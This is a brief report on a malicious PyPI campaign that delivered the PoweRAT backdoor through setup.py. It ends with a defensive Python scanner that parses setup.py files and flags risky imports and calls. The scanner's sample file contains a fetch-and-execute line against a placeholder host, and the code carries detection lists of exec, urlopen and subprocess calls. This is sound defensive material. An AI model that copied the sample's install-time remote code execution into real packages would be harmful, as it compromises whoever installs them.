Phylum, a software supply chain security company, has identified a malicious campaign targeting Python Package Index (PyPI) users with the PoweRAT backdoor and information stealer. The campaign was first detected on December 22, 2022, with the discovery of PyroLogin, a malicious Python package built to fetch code from a remote server and silently execute it.
The EasyTimeStamp, Discorder, Discord-dev, Style.py, and PythonStyles packages all contained code similar to PyroLogin, and all were published to PyPI between December 28 and December 31. The infection chain starts with a setup.py file, so the malware is deployed automatically when any of the malicious packages is installed with pip.
The infection chain involves the execution of numerous scripts and the exploitation of legitimate operating system features.
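An added example (not Phylum's code and not taken from the malicious packages): a static check that parses a setup.py with Python's `ast` module, without executing it, and flags the fetch-and-execute pattern described above. The module and call lists, the function name, and both sample files are assumptions constructed for illustration.

```python
import ast

# Modules whose import inside setup.py deserves a manual look (assumed list).
RISKY_MODULES = {"urllib", "requests", "socket", "subprocess", "base64", "ctypes"}
# Calls that run dynamically supplied code or commands, or fetch remote content.
RISKY_CALLS = {"exec", "eval", "compile", "__import__", "system", "popen", "Popen", "urlopen"}

# Constructed sample: an ordinary setup.py.
BENIGN_SETUP = '''\
from setuptools import setup
setup(name="example-pkg", version="1.0", py_modules=["example"])
'''

# Constructed sample: fetches remote code at install time and executes it.
# It is only ever parsed here, never run; the URL is a placeholder.
SUSPICIOUS_SETUP = '''\
from setuptools import setup
import urllib.request
exec(urllib.request.urlopen("https://example.invalid/stage").read())
setup(name="example-pkg", version="1.0")
'''


def audit_setup_py(source: str) -> list[tuple[int, str]]:
    """Return sorted (line, finding) pairs for a setup.py source string."""
    findings = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names = [alias.name for alias in node.names]
        elif isinstance(node, ast.ImportFrom):
            names = [node.module or ""]
        else:
            names = []
        for name in names:
            if name.split(".")[0] in RISKY_MODULES:
                findings.add((node.lineno, f"imports {name}"))
        if isinstance(node, ast.Call):
            func = node.func
            # Plain name (exec) or last attribute of a dotted call (urlopen).
            called = func.id if isinstance(func, ast.Name) else getattr(func, "attr", None)
            if called in RISKY_CALLS:
                findings.add((node.lineno, f"calls {called}()"))
    return sorted(findings)


if __name__ == "__main__":
    for label, src in (("benign", BENIGN_SETUP), ("suspicious", SUSPICIOUS_SETUP)):
        print(label, audit_setup_py(src))
```

This is a triage heuristic for a setup.py extracted from a source archive before installation: obfuscated or indirectly invoked code can evade it, so an empty result is not proof that a package is safe.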